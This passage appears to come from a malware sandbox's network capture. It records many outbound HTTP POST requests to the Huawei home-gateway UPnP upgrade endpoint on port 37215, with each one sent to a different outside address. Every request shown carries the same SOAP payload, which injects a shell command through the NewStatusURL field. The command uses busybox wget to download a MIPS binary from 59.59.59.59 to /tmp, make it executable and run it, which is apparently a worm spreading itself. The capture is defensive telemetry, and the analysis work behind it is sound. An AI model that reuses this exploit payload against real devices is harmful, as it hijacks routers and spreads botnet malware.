                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2249192.168.2.1543830157.135.19.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.266222954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2250192.168.2.1551776197.14.155.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.266273022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2251192.168.2.153391241.148.5.19437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.294552088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2252192.168.2.1538794157.196.158.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.294595003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2253192.168.2.154490241.16.105.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.294620037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2254192.168.2.1538280157.41.229.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.294641018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2255192.168.2.1548132197.38.142.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.294661999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2256192.168.2.155235698.128.116.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.294681072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2257192.168.2.1548328157.48.42.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299146891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2258192.168.2.1544572191.227.144.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:27.299200058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
